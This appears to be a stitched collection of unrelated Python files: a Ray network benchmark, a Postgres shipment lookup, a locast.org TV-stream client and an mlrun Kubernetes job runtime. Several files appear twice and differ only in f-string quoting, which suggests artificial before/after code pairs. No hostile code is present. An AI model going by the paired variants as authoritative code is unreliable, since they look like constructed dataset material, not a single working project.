worker.compute_gradients.remote() result = ps.receive.remote(grads) ray.wait([result]) elapsed_time_ms = (time.perf_counter() - start_time)*1000 time_list.append(elapsed_time_ms) rate = args.size_mb / (elapsed_time_ms/1000) log('%03d/%d sent %d MBs in %.1f ms: %.2f MB/second' % (i, args.iters, args.size_mb, elapsed_time_ms, rate)) min = np.min(time_list) median = np.median(time_list) log(f"min: {min:8.2f}, median: {median:8.2f}, mean: {np.mean(time_list):8.2f}") def main(): if args.role == 'launcher': run_launcher() elif args.role == 'driver': run_driver() else: assert False, f"Unknown role {args.role}, must be laucher/driver" if __name__ == '__main__': main()
#!/usr/bin/env python # # Example of two process Ray program, worker sends values to parameter # server on a different machine # # Run locally: # ./ray_two_machines.py # # Run on AWS: # ./ray_two_machines.py --aws # Example timings # c5.18xlarge over network: over network: 63.0 ms: 1586.76 MB/second # c5.9xlarge over network: 399/400 added 100 MBs in 85.5 ms: 1170.26 MB/second # c5.18xlarge locally: 86 ms, 1218 MB/seconds (9.7 Gbps) # macbook pro locally: 978.9 ms, 102.15 MB/second # c5.18xlarge # 004/11 sent 100 MBs in 69.4 ms: 1440.31 MB/second # 005/11 sent 100 MBs in 68.1 ms: 1468.95 MB/second # 006/11 sent 100 MBs in 70.4 ms: 1421.40 MB/second # 007/11 sent 100 MBs in 69.5 ms: 1438.62 MB/second # 008/11 sent 100 MBs in 66.4 ms: 1506.90 MB/second # 009/11 sent 100 MBs in 76.5 ms: 1306.92 MB/second # 010/11 sent 100 MBs in 66.8 ms: 1497.64 MB/second # min: 66.36, median: 69.43, mean: 70.55 # Another run # 989/1000 sent 100 MBs in 54.6 ms: 1831.07 MB/second # 990/1000 sent 100 MBs in 54.4 ms: 1837.20 MB/second # 991/1000 sent 100 MBs in 54.8 ms: 1824.91 MB/second # 992/1000 sent 100 MBs in 53.4 ms: 1874.39 MB/second # 993/1000 sent 100 MBs in 53.1 ms: 1881.77 MB/second # 994/1000 sent 100 MBs in 52.7 ms: 1897.76 MB/second # 995/1000 sent 100 MBs in 55.4 ms: 1805.42 MB/second # 996/1000 sent 100 MBs in 53.4 ms: 1872.93 MB/second # 997/1000 sent 100 MBs in 52.7 ms: 1896.65 MB/second # 998/1000 sent 100 MBs in 54.0 ms: 1851.14 MB/second # 999/1000 sent 100 MBs in 53.6 ms: 1864.93 MB/second # min: 51.11, median: 55.45, mean: 60.74 # Bottom line: 30ms locally, 60ms over network import argparse import os import socket import subprocess import time import numpy as np import ray import util parser = argparse.ArgumentParser() parser.add_argument("--role", default='launcher', type=str, help="launcher/driver") parser.add_argument('--image', default='Deep Learning AMI (Ubuntu) Version 15.0') parser.add_argument("--size-mb", default=100, type=int, help='how much data to send at each iteration') parser.add_argument("--iters", default=11, type=int) parser.add_argument("--aws", action="store_true", help="enable to run on AWS") parser.add_argument("--xray", default=1, type=int, help="whether to use XRay backend") parser.add_argument('--nightly', default=1, type=int, help='whether to use nightly version') parser.add_argument('--name', default='ray_two_machines', type=str, help='name of the run') parser.add_argument("--ip", default='', type=str, help="internal flag, used to point worker to head node") args = parser.parse_args() dim = args.size_mb * 250 * 1000 @ray.remote(resources={"worker": 1}) class Worker(object): def __init__(self): self.gradients = np.ones(dim, dtype=np.float32) def compute_gradients(self): return self.gradients def ip(self): return ray.services.get_node_ip_address() @ray.remote(resources={"ps": 1}) class ParameterServer(object): def __init__(self): self.params = np.zeros(dim, dtype=np.float32) def receive(self, grad): self.params = grad # use = just to get network overhead return self.params def get_weights(self): return self.params def ip(self): return ray.services.get_node_ip_address() def run_launcher(): import ncluster if args.aws: ncluster.set_backend('aws') if args.nightly: # running locally MacOS print(f"asdfasdf {util.ossystem('uname')}") if 'Darwin' in util.ossystem('uname') and not args.aws: install_script = 'pip install -U https://s3-us-west-2.amazonaws.com/ray-wheels/latest/ray-0.5.2-cp36-cp36m-macosx_10_6_intel.whl' print(f"asdfasdf got install script {install_script}") else: install_script = 'pip install -U https://s3-us-west-2.amazonaws.com/ray-wheels/latest/ray-0.5.2-cp36-cp36m-manylinux1_x86_64.whl' else: install_script = 'pip install ray' job = ncluster.make_job(name=args.name, install_script=install_script, image_name=args.image, num_tasks=2) ps, worker = job.tasks if not ncluster.running_locally(): ps._run_raw('killall python', ignore_errors=True) worker._run_raw('killall python', ignore_errors=True) job.upload(__file__) job.upload('util.py') if args.xray: job.run('export RAY_USE_XRAY=1') job.run('ray stop') # https://ray.readthedocs.io/en/latest/resources.html?highlight=resources ps_resource = """--resources='{"ps": 1}'""" worker_resource = """--resources='{"worker": 1}'""" ps.run(f"ray start --head {ps_resource} --redis-port=6379") worker.run(f"ray start --redis-address={ps.ip}:6379 {worker_resource}") worker.run( f'./{__file__} --role=driver --ip={ps.ip}:6379 --size-mb={args.size_mb} --iters={args.iters}') print(worker.read('out')) def run_driver(): ray.init(redis_address=args.ip) worker = Worker.remote() ps = ParameterServer.remote() log = util.FileLogger('out') log(f"Worker ip {ray.get(worker.ip.remote())}") log(f"PS ip {ray.get(ps.ip.remote())}") log(f"Driver ip {socket.gethostbyname(socket.gethostname())}") time_list = [] for i in range(args.iters): start_time = time.perf_counter() grads = worker.compute_gradients.remote() result = ps.receive.remote(grads) ray.wait([result]) elapsed_time_ms = (time.perf_counter() - start_time)*1000 time_list.append(elapsed_time_ms) rate = args.size_mb / (elapsed_time_ms/1000) log('%03d/%d sent %d MBs in %.1f ms: %.2f MB/second' % (i, args.iters, args.size_mb, elapsed_time_ms, rate)) min = np.min(time_list) median = np.median(time_list) log(f"min: {min:8.2f}, median: {median:8.2f}, mean: {np.mean(time_list):8.2f}") def main(): if args.role == 'launcher': run_launcher() elif args.role == 'driver': run_driver() else: assert False, f"Unknown role {args.role}, must be laucher/driver" if __name__ == '__main__': main()
import sys import time import psycopg2 as psycopg2 import os def start_database(): try: while True: try: conn = psycopg2.connect(dbname=os.environ['DB_NAME'], user=os.environ['DB_USERNAME'], password=os.environ['DB_PASSWORD'], host=os.environ['DB_HOSTNAME'], options=f'-c search_path={'schema_package'}') cur = conn.cursor() cur.execute('''select * from customer''') except psycopg2.OperationalError as e: print("Database is down: ", e) time.sleep(0.5) continue return conn except KeyError as e: raise Exception("Environment variable is missing: ", e) class ShipmentDatabase: def __init__(self): self.conn = start_database() def getShipmentsMap(self, key): cur = self.conn.cursor() cur.execute("""SELECT c.customerId, si.shipmentid, si.barcode, ST_AsText(si.destination), ST_AsText(si.startlocation), si.attachedprocessinstance, si.price, si.state FROM customer c INNER JOIN shipmentinfo si ON si.customerid = c.customerid WHERE c.customerApiKey ILIKE %s""", (key,)) el = [] for record in cur: el.append({ 'customerId': record[0], 'shipmentId': record[1], 'barcode': record[2], 'destination': record[3], 'startLocation': record[4], 'attachedProcessInstance': record[5], 'price': float(record[6]), 'state': record[7], }) return el
import sys import time import psycopg2 as psycopg2 import os def start_database(): try: while True: try: conn = psycopg2.connect(dbname=os.environ['DB_NAME'], user=os.environ['DB_USERNAME'], password=os.environ['DB_PASSWORD'], host=os.environ['DB_HOSTNAME'], options=f'-c search_path={"schema_package"}') cur = conn.cursor() cur.execute('''select * from customer''') except psycopg2.OperationalError as e: print("Database is down: ", e) time.sleep(0.5) continue return conn except KeyError as e: raise Exception("Environment variable is missing: ", e) class ShipmentDatabase: def __init__(self): self.conn = start_database() def getShipmentsMap(self, key): cur = self.conn.cursor() cur.execute("""SELECT c.customerId, si.shipmentid, si.barcode, ST_AsText(si.destination), ST_AsText(si.startlocation), si.attachedprocessinstance, si.price, si.state FROM customer c INNER JOIN shipmentinfo si ON si.customerid = c.customerid WHERE c.customerApiKey ILIKE %s""", (key,)) el = [] for record in cur: el.append({ 'customerId': record[0], 'shipmentId': record[1], 'barcode': record[2], 'destination': record[3], 'startLocation': record[4], 'attachedProcessInstance': record[5], 'price': float(record[6]), 'state': record[7], }) return el
import logging import re import threading from datetime import datetime from typing import Optional, Tuple import uuid import m3u8 import requests from locast2dvr.utils import Configuration, LoggingHandler from requests.exceptions import HTTPError from timezonefinder import TimezoneFinder from .fcc import Facilities LOGIN_URL = "https://api.locastnet.org/api/user/login" USER_URL = "https://api.locastnet.org/api/user/me" DMA_URL = "https://api.locastnet.org/api/watch/dma" IP_URL = 'https://api.locastnet.org/api/watch/dma/ip' STATIONS_URL = 'https://api.locastnet.org/api/watch/epg' WATCH_URL = 'https://api.locastnet.org/api/watch/station' TOKEN_LIFETIME = 3600 class Geo: def __init__(self, zipcode: Optional[str] = None, coords: Optional[dict] = None): """Object containing location information Args: zipcode (Optional[str], optional): Zipcode. Defaults to None. coords (Optional[dict], optional): Dict containing latitude and longitude. Defaults to None. """ self.zipcode = zipcode self.coords = coords def __repr__(self) -> str: if self.zipcode: return f"Geo(zipcode: {self.zipcode})" elif self.coords: return f"Geo(coords: {self.coords})" else: return f"Geo(None)" def __eq__(self, other): return self.coords == other.coords and \ self.zipcode == other.zipcode class LocationInvalidError(Exception): pass class UserInvalidError(Exception): pass class LocastService(LoggingHandler): _logged_in = False log = logging.getLogger("LocastService") # Necessary for class methods _login_lock = threading.Lock() def __init__(self, config: Configuration, geo: Geo): """Locast service interface based on a specific location Args: geo (Geo): Location information config (Configuration): Global configuration """ super().__init__() self.coords = geo.coords self.zipcode = geo.zipcode self.config = config self.location = None self.active = False self.dma = None self.city = None self.timezone = None self._channel_lock = threading.Lock() def start(self): self._fcc_facilities = Facilities.instance() self._load_location_data() self.uid = str(uuid.uuid5(uuid.UUID(self.config.uid), str(self.dma))) # Start cache updater timer if necessary, otherwise, just preload # stations once if self.config.cache_stations: self._update_cache() @classmethod def login(cls, username: str = None, password: str = None): """Log in to locast.org This is a class method, so we only have to login once. Args: username (str): Username password (str): Password """ with cls._login_lock: if username: cls.username = username if password: cls.password = password cls.log.info(f"Logging in with {cls.username}") try: r = requests.post(LOGIN_URL, json={ "username": cls.username, "password": cls.password }, headers={'Content-Type': 'application/json'}) r.raise_for_status() except HTTPError as err: raise UserInvalidError(f'Login failed: {err}') cls.token = r.json()['token'] cls._logged_in = True cls.last_login = datetime.now() cls._validate_user() cls.log.info("Locast login successful") @classmethod def _validate_user(cls) -> bool: """Validate if the user has an active donation Returns: bool: True if successful, otherwise False """ r = cls.get(USER_URL, authenticated=True) user_info = r.json() if user_info['didDonate'] and datetime.now() > datetime.fromtimestamp(user_info['donationExpire'] / 1000): raise UserInvalidError("Donation expired") elif not user_info['didDonate']: raise UserInvalidError("User didn't donate") def _is_token_valid(self) -> bool: """Check if the last login was longer than ``TOKEN_LIFETIME`` ago Returns: bool: True if valid, False otherwise """ with self._login_lock: return (datetime.now() - self.last_login).seconds < TOKEN_LIFETIME def _validate_token(self): """Validate if the login token is still valid. If not, login again to obtain a new token """ if not self._is_token_valid(): self.log.info("Login token expired!") self.login() def _load_location_data(self): """Load location data Raises: LocationInvalidError: If locast doesn't support the location """ self._find_location() if not self.active: raise LocationInvalidError(f'Locast not available in {self.city}') def _find_location(self): """Set the location data (lat, long, dma and city) based on what method is used to determine the location (coords, zip or IP) """ if self.coords: self._set_attrs_from_geo( f'{DMA_URL}/{self.coords['latitude']}/{self.coords['longitude']}') elif self.zipcode: self._set_attrs_from_geo(f'{DMA_URL}/zip/{self.zipcode}') else: self._set_attrs_from_geo(IP_URL) def _set_attrs_from_geo(self, url: str): """Set location data (lat, long, dma and city) based on the url that is passed in Args: url (str): Locast URL that is used to lookup a location Raises: LocationInvalidError: If the HTTP request fails or if the location is not found """ try: r = self.get(url) except HTTPError as err: raise LocationInvalidError(err) if r.status_code == 204: raise LocationInvalidError(f"Geo not found for {url}") geo = r.json() self.location = { 'latitude': geo['latitude'], 'longitude': geo['longitude']} self.dma = str(geo['DMA']) self.active = geo['active'] self.city = geo['name'] self.timezone = TimezoneFinder().timezone_at( lng=self.location['longitude'], lat=self.location['latitude']) def get_stations(self) -> list: """Get all station information and return in such a way that PMS can use it This is done by getting station information from locast.org and and where necessary complement channel numbers this with data from the FCC. Some locast stations already have the channel number (like 4.1 CBS) as part of the call sign, while others don't (like KUSDDT2). In this case we first split the call sign (KUSD) from the sub channel number (2) and lookup the channel number using the FCC facilities. FCC call signs can be in either the 'name' or 'callSign' property of a Locast station. Lastly, if we can't find a channel number, we just make something up, but this should rarely happen. Note: if caching is disabled, calling this method will lead to calling locast for channel information (incl EPG data) every time. Returns: list: stations """ if self.config.cache_stations: with self._channel_lock: return self._stations else: return self._get_stations() def _update_cache(self): """Update the station cache After this method is done fetching station information, it will schedule itself to run again after `self.config.cache_timeout` seconds.add() """ stations = self._get_stations() with self._channel_lock: self._stations = stations threading.Timer(self.config.cache_timeout, self._update_cache).start() def _get_stations(self) -> list: """Actual implementation of retrieving all station information Returns: list: stations """ self.log.info( f"Loading stations for {self.city} (cache: {self.config.cache_stations}, cache timeout: {self.config.cache_timeout}, days: {self.config.days})") stations = self._get_locast_stations() fake_channel = 1000 for station in stations: station['timezone'] = self.timezone station['city'] = self.city # See if station conforms to "X.Y Name" m = re.match(r'(\d+\.\d+) .+', station['callSign']) if m: station['channel'] = m.group(1) continue # Done with this station # Check if we can use the callSign or name to figure out the channel number # This is done by first detecting the call sign, station type and subchannel # and looking the channel number up from the FCC facilities result = (self._detect_callsign(station['name']) or self._detect_callsign(station['callSign'])) if result: # name or callSign match to a valid call sign (call_sign, subchannel) = result # Lookup the station from FCC facilities fcc_station = self._fcc_facilities.by_dma_and_call_sign( self.dma, call_sign) if fcc_station: station['channel'] = fcc_station["channel"] if fcc_station[ 'analog'] else f'{fcc_station['channel']}.{subchannel or 1}' continue # Done with this sation # Can't find the channel number, so we make something up - This shouldn't really happen self.log.warning( f"Channel (name: {station["name"]}, callSign: {station["callSign"]}) not found. Assigning {fake_channel}") station['channel'] = str(fake_channel) fake_channel += 1 return stations def _get_locast_stations(self) -> list: """Get all the stations from locast for the current DMA Returns: list: Locast stations Raises: HTTPError: if the HTTP request to locast fails """ self._validate_token() start_time = datetime.utcnow().strftime("%Y-%m-%dT00:00:00-00:00") url = f'{STATIONS_URL}/{self.dma}?startTime={start_time}&hours={self.config.days * 24}' r = self.get(url, authenticated=True) return r.json() def _detect_callsign(self, input: str) -> Tuple[str, str]: """Detect a call sign and possibly subchannel from a string Args: input (str): String to find a callsign in Returns: Tuple[str, str]: tuple with callsign and subchannel None: in case no callsign was found """ m = re.match(r'^([KW][A-Z]{2,3})[A-Z]{0,2}(\d{0,2})$', input) if m: (call_sign, subchannel) = m.groups() return (call_sign, subchannel) return None def get_station_stream_uri(self, station_id: str) -> str: """Get the steam URL for a station. This always returns the URL with the highest resolution. Args: station_id (str): Locast station ID Returns: str: URL with the stream Raises: HTTPError: in case the request to locast.org fails """ self._validate_token() url = f'{WATCH_URL}/{station_id}/{self.location['latitude']}/{self.location['longitude']}' r = self.get(url, authenticated=True) # Stream URLs can either be just URLs or m3u8 playlists with multiple resolutions stream_url = r.json()["streamUrl"] m3u8_data = m3u8.load(stream_url) if len(m3u8_data.playlists) == 0: return stream_url # Sort the playlists by resolution and take the top best_resolution = sorted(m3u8_data.playlists, key=lambda pl: pl.stream_info.resolution).pop() return best_resolution.absolute_uri @classmethod def get(cls, url: str, authenticated=False, extra_headers={}): """Utility method for making HTTP GET requests. Note that Locast.token needs to be set when authenticated=True. Args: url (str): URL to get authenticated (bool, optional): Use an authenticated request. Defaults to False. extra_headers (dict, optional): Optional additional heades. Defaults to {}. Returns: [type]: [description] """ headers = { 'Content-Type': 'application/json', 'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36" } headers.update(extra_headers) if authenticated: headers.update({'authorization': f'Bearer {cls.token}'}) r = requests.get(url, headers=headers) r.raise_for_status() return r
import logging import re import threading from datetime import datetime from typing import Optional, Tuple import uuid import m3u8 import requests from locast2dvr.utils import Configuration, LoggingHandler from requests.exceptions import HTTPError from timezonefinder import TimezoneFinder from .fcc import Facilities LOGIN_URL = "https://api.locastnet.org/api/user/login" USER_URL = "https://api.locastnet.org/api/user/me" DMA_URL = "https://api.locastnet.org/api/watch/dma" IP_URL = 'https://api.locastnet.org/api/watch/dma/ip' STATIONS_URL = 'https://api.locastnet.org/api/watch/epg' WATCH_URL = 'https://api.locastnet.org/api/watch/station' TOKEN_LIFETIME = 3600 class Geo: def __init__(self, zipcode: Optional[str] = None, coords: Optional[dict] = None): """Object containing location information Args: zipcode (Optional[str], optional): Zipcode. Defaults to None. coords (Optional[dict], optional): Dict containing latitude and longitude. Defaults to None. """ self.zipcode = zipcode self.coords = coords def __repr__(self) -> str: if self.zipcode: return f"Geo(zipcode: {self.zipcode})" elif self.coords: return f"Geo(coords: {self.coords})" else: return f"Geo(None)" def __eq__(self, other): return self.coords == other.coords and \ self.zipcode == other.zipcode class LocationInvalidError(Exception): pass class UserInvalidError(Exception): pass class LocastService(LoggingHandler): _logged_in = False log = logging.getLogger("LocastService") # Necessary for class methods _login_lock = threading.Lock() def __init__(self, config: Configuration, geo: Geo): """Locast service interface based on a specific location Args: geo (Geo): Location information config (Configuration): Global configuration """ super().__init__() self.coords = geo.coords self.zipcode = geo.zipcode self.config = config self.location = None self.active = False self.dma = None self.city = None self.timezone = None self._channel_lock = threading.Lock() def start(self): self._fcc_facilities = Facilities.instance() self._load_location_data() self.uid = str(uuid.uuid5(uuid.UUID(self.config.uid), str(self.dma))) # Start cache updater timer if necessary, otherwise, just preload # stations once if self.config.cache_stations: self._update_cache() @classmethod def login(cls, username: str = None, password: str = None): """Log in to locast.org This is a class method, so we only have to login once. Args: username (str): Username password (str): Password """ with cls._login_lock: if username: cls.username = username if password: cls.password = password cls.log.info(f"Logging in with {cls.username}") try: r = requests.post(LOGIN_URL, json={ "username": cls.username, "password": cls.password }, headers={'Content-Type': 'application/json'}) r.raise_for_status() except HTTPError as err: raise UserInvalidError(f'Login failed: {err}') cls.token = r.json()['token'] cls._logged_in = True cls.last_login = datetime.now() cls._validate_user() cls.log.info("Locast login successful") @classmethod def _validate_user(cls) -> bool: """Validate if the user has an active donation Returns: bool: True if successful, otherwise False """ r = cls.get(USER_URL, authenticated=True) user_info = r.json() if user_info['didDonate'] and datetime.now() > datetime.fromtimestamp(user_info['donationExpire'] / 1000): raise UserInvalidError("Donation expired") elif not user_info['didDonate']: raise UserInvalidError("User didn't donate") def _is_token_valid(self) -> bool: """Check if the last login was longer than ``TOKEN_LIFETIME`` ago Returns: bool: True if valid, False otherwise """ with self._login_lock: return (datetime.now() - self.last_login).seconds < TOKEN_LIFETIME def _validate_token(self): """Validate if the login token is still valid. If not, login again to obtain a new token """ if not self._is_token_valid(): self.log.info("Login token expired!") self.login() def _load_location_data(self): """Load location data Raises: LocationInvalidError: If locast doesn't support the location """ self._find_location() if not self.active: raise LocationInvalidError(f'Locast not available in {self.city}') def _find_location(self): """Set the location data (lat, long, dma and city) based on what method is used to determine the location (coords, zip or IP) """ if self.coords: self._set_attrs_from_geo( f'{DMA_URL}/{self.coords["latitude"]}/{self.coords["longitude"]}') elif self.zipcode: self._set_attrs_from_geo(f'{DMA_URL}/zip/{self.zipcode}') else: self._set_attrs_from_geo(IP_URL) def _set_attrs_from_geo(self, url: str): """Set location data (lat, long, dma and city) based on the url that is passed in Args: url (str): Locast URL that is used to lookup a location Raises: LocationInvalidError: If the HTTP request fails or if the location is not found """ try: r = self.get(url) except HTTPError as err: raise LocationInvalidError(err) if r.status_code == 204: raise LocationInvalidError(f"Geo not found for {url}") geo = r.json() self.location = { 'latitude': geo['latitude'], 'longitude': geo['longitude']} self.dma = str(geo['DMA']) self.active = geo['active'] self.city = geo['name'] self.timezone = TimezoneFinder().timezone_at( lng=self.location['longitude'], lat=self.location['latitude']) def get_stations(self) -> list: """Get all station information and return in such a way that PMS can use it This is done by getting station information from locast.org and and where necessary complement channel numbers this with data from the FCC. Some locast stations already have the channel number (like 4.1 CBS) as part of the call sign, while others don't (like KUSDDT2). In this case we first split the call sign (KUSD) from the sub channel number (2) and lookup the channel number using the FCC facilities. FCC call signs can be in either the 'name' or 'callSign' property of a Locast station. Lastly, if we can't find a channel number, we just make something up, but this should rarely happen. Note: if caching is disabled, calling this method will lead to calling locast for channel information (incl EPG data) every time. Returns: list: stations """ if self.config.cache_stations: with self._channel_lock: return self._stations else: return self._get_stations() def _update_cache(self): """Update the station cache After this method is done fetching station information, it will schedule itself to run again after `self.config.cache_timeout` seconds.add() """ stations = self._get_stations() with self._channel_lock: self._stations = stations threading.Timer(self.config.cache_timeout, self._update_cache).start() def _get_stations(self) -> list: """Actual implementation of retrieving all station information Returns: list: stations """ self.log.info( f"Loading stations for {self.city} (cache: {self.config.cache_stations}, cache timeout: {self.config.cache_timeout}, days: {self.config.days})") stations = self._get_locast_stations() fake_channel = 1000 for station in stations: station['timezone'] = self.timezone station['city'] = self.city # See if station conforms to "X.Y Name" m = re.match(r'(\d+\.\d+) .+', station['callSign']) if m: station['channel'] = m.group(1) continue # Done with this station # Check if we can use the callSign or name to figure out the channel number # This is done by first detecting the call sign, station type and subchannel # and looking the channel number up from the FCC facilities result = (self._detect_callsign(station['name']) or self._detect_callsign(station['callSign'])) if result: # name or callSign match to a valid call sign (call_sign, subchannel) = result # Lookup the station from FCC facilities fcc_station = self._fcc_facilities.by_dma_and_call_sign( self.dma, call_sign) if fcc_station: station['channel'] = fcc_station["channel"] if fcc_station[ 'analog'] else f'{fcc_station["channel"]}.{subchannel or 1}' continue # Done with this sation # Can't find the channel number, so we make something up - This shouldn't really happen self.log.warning( f"Channel (name: {station['name']}, callSign: {station['callSign']}) not found. Assigning {fake_channel}") station['channel'] = str(fake_channel) fake_channel += 1 return stations def _get_locast_stations(self) -> list: """Get all the stations from locast for the current DMA Returns: list: Locast stations Raises: HTTPError: if the HTTP request to locast fails """ self._validate_token() start_time = datetime.utcnow().strftime("%Y-%m-%dT00:00:00-00:00") url = f'{STATIONS_URL}/{self.dma}?startTime={start_time}&hours={self.config.days * 24}' r = self.get(url, authenticated=True) return r.json() def _detect_callsign(self, input: str) -> Tuple[str, str]: """Detect a call sign and possibly subchannel from a string Args: input (str): String to find a callsign in Returns: Tuple[str, str]: tuple with callsign and subchannel None: in case no callsign was found """ m = re.match(r'^([KW][A-Z]{2,3})[A-Z]{0,2}(\d{0,2})$', input) if m: (call_sign, subchannel) = m.groups() return (call_sign, subchannel) return None def get_station_stream_uri(self, station_id: str) -> str: """Get the steam URL for a station. This always returns the URL with the highest resolution. Args: station_id (str): Locast station ID Returns: str: URL with the stream Raises: HTTPError: in case the request to locast.org fails """ self._validate_token() url = f'{WATCH_URL}/{station_id}/{self.location["latitude"]}/{self.location["longitude"]}' r = self.get(url, authenticated=True) # Stream URLs can either be just URLs or m3u8 playlists with multiple resolutions stream_url = r.json()["streamUrl"] m3u8_data = m3u8.load(stream_url) if len(m3u8_data.playlists) == 0: return stream_url # Sort the playlists by resolution and take the top best_resolution = sorted(m3u8_data.playlists, key=lambda pl: pl.stream_info.resolution).pop() return best_resolution.absolute_uri @classmethod def get(cls, url: str, authenticated=False, extra_headers={}): """Utility method for making HTTP GET requests. Note that Locast.token needs to be set when authenticated=True. Args: url (str): URL to get authenticated (bool, optional): Use an authenticated request. Defaults to False. extra_headers (dict, optional): Optional additional heades. Defaults to {}. Returns: [type]: [description] """ headers = { 'Content-Type': 'application/json', 'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36" } headers.update(extra_headers) if authenticated: headers.update({'authorization': f'Bearer {cls.token}'}) r = requests.get(url, headers=headers) r.raise_for_status() return r
# Copyright 2018 Iguazio # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import time import typing from kubernetes import client from kubernetes.client.rest import ApiException import mlrun.api.schemas import mlrun.errors from mlrun.runtimes.base import BaseRuntimeHandler from ..builder import build_runtime from ..db import RunDBError from ..kfpops import build_op from ..model import RunObject from ..utils import get_in, logger from .base import RunError from .pod import KubeResource, kube_resource_spec_to_pod_spec from .utils import AsyncLogWriter class KubejobRuntime(KubeResource): kind = "job" _is_nested = True _is_remote = True @property def is_deployed(self): """check if the function is deployed (have a valid container)""" if self.spec.image: return True if self._is_remote_api(): db = self._get_db() try: db.get_builder_status(self, logs=False) except Exception: pass if self.spec.image: return True if self.status.state and self.status.state == "ready": return True return False def with_source_archive(self, source, pythonpath=None, pull_at_runtime=True): """load the code from git/tar/zip archive at runtime or build :param source: valid path to git, zip, or tar file, e.g. git://github.com/mlrun/something.git http://some/url/file.zip :param pythonpath: python search path relative to the archive root or absolute (e.g. './subdir') :param pull_at_runtime: load the archive into the container at job runtime vs on build/deploy """ self.spec.build.load_source_on_run = pull_at_runtime self.spec.build.source = source if pythonpath: self.spec.pythonpath = pythonpath def build_config( self, image="", base_image=None, commands: list = None, secret=None, source=None, extra=None, load_source_on_run=None, with_mlrun=None, auto_build=None, ): """specify builder configuration for the deploy operation :param image: target image name/path :param base_image: base image name/path :param commands: list of docker build (RUN) commands e.g. ['pip install pandas'] :param secret: k8s secret for accessing the docker registry :param source: source git/tar archive to load code from in to the context/workdir e.g. git://github.com/mlrun/something.git#development :param extra: extra Dockerfile lines :param load_source_on_run: load the archive code into the container at runtime vs at build time :param with_mlrun: add the current mlrun package to the container build :param auto_build: when set to True and the function require build it will be built on the first function run, use only if you dont plan on changing the build config between runs """ if image: self.spec.build.image = image if commands: if not isinstance(commands, list): raise ValueError("commands must be a string list") self.spec.build.commands = self.spec.build.commands or [] self.spec.build.commands += commands if extra: self.spec.build.extra = extra if secret: self.spec.build.secret = secret if base_image: self.spec.build.base_image = base_image if source: self.spec.build.source = source if load_source_on_run: self.spec.build.load_source_on_run = load_source_on_run if with_mlrun is not None: self.spec.build.with_mlrun = with_mlrun if auto_build: self.spec.build.auto_build = auto_build def deploy( self, watch=True, with_mlrun=None, skip_deployed=False, is_kfp=False, mlrun_version_specifier=None, builder_env: dict = None, ) -> bool: """deploy function, build container with dependencies :param watch: wait for the deploy to complete (and print build logs) :param with_mlrun: add the current mlrun package to the container build :param skip_deployed: skip the build if we already have an image for the function :param mlrun_version_specifier: which mlrun package version to include (if not current) :param builder_env: Kaniko builder pod env vars dict (for config/credentials) e.g. builder_env={"GIT_TOKEN": token} :return True if the function is ready (deployed) """ build = self.spec.build if with_mlrun is None: if build.with_mlrun is not None: with_mlrun = build.with_mlrun else: with_mlrun = build.base_image and not ( build.base_image.startswith("mlrun/") or "/mlrun/" in build.base_image ) if not build.source and not build.commands and not build.extra and with_mlrun: logger.info( "running build to add mlrun package, set " "with_mlrun=False to skip if its already in the image" ) self.status.state = "" # When we're in pipelines context we must watch otherwise the pipelines pod will exit before the operation # is actually done. (when a pipelines pod exits, the pipeline step marked as done) if is_kfp: watch = True if self._is_remote_api(): db = self._get_db() data = db.remote_builder( self, with_mlrun, mlrun_version_specifier, skip_deployed, builder_env=builder_env, ) self.status = data["data"].get("status", None) self.spec.image = get_in(data, "data.spec.image") ready = data.get("ready", False) if not ready: logger.info( f"Started building image: {data.get("data", {}).get('spec', {}).get("build", {}).get('image')}" ) if watch and not ready: state = self._build_watch(watch) ready = state == "ready" self.status.state = state else: self.save(versioned=False) ready = build_runtime( mlrun.api.schemas.AuthInfo(), self, with_mlrun, mlrun_version_specifier, skip_deployed, watch, ) self.save(versioned=False) if watch and not ready: raise mlrun.errors.MLRunRuntimeError("Deploy failed") return ready def _build_watch(self, watch=True, logs=True): db = self._get_db() offset = 0 try: text, _ = db.get_builder_status(self, 0, logs=logs) except RunDBError: raise ValueError("function or build process not found") if text: print(text) if watch: while self.status.state in ["pending", "running"]: offset += len(text) time.sleep(2) text, _ = db.get_builder_status(self, offset, logs=logs) if text: print(text, end="") return self.status.state def builder_status(self, watch=True, logs=True): if self._is_remote_api(): return self._build_watch(watch, logs) else: pod = self.status.build_pod if not self.status.state == "ready" and pod: k8s = self._get_k8s() status = k8s.get_pod_status(pod) if logs: if watch: status = k8s.watch(pod) else: resp = k8s.logs(pod) if resp: print(resp.encode()) if status == "succeeded": self.status.build_pod = None self.status.state = "ready" logger.info("build completed successfully") return "ready" if status in ["failed", "error"]: self.status.state = status logger.error(f" build {status}, watch the build pod logs: {pod}") return status logger.info(f"builder status is: {status}, wait for it to complete") return None def deploy_step( self, image=None, base_image=None, commands: list = None, secret_name="", with_mlrun=True, skip_deployed=False, ): function_name = self.metadata.name or "function" name = f"deploy_{function_name}" # mark that the function/image is built as part of the pipeline so other places # which use the function will grab the updated image/status self._build_in_pipeline = True return build_op( name, self, image=image, base_image=base_image, commands=commands, secret_name=secret_name, with_mlrun=with_mlrun, skip_deployed=skip_deployed, ) def _run(self, runobj: RunObject, execution): command, args, extra_env = self._get_cmd_args(runobj) if runobj.metadata.iteration: self.store_run(runobj) k8s = self._get_k8s() new_meta = self._get_meta(runobj) if self._secrets: if self._secrets.has_vault_source(): self._add_vault_params_to_spec(runobj) if self._secrets.has_azure_vault_source(): self._add_azure_vault_params_to_spec( self._secrets.get_azure_vault_k8s_secret() ) self._add_project_k8s_secrets_to_spec( self._secrets.get_k8s_secrets(), runobj ) else: self._add_project_k8s_secrets_to_spec(None, runobj) pod_spec = func_to_pod( self.full_image_path(), self, extra_env, command, args, self.spec.workdir ) pod = client.V1Pod(metadata=new_meta, spec=pod_spec) try: pod_name, namespace = k8s.create_pod(pod) except ApiException as exc: raise RunError(str(exc)) if pod_name and 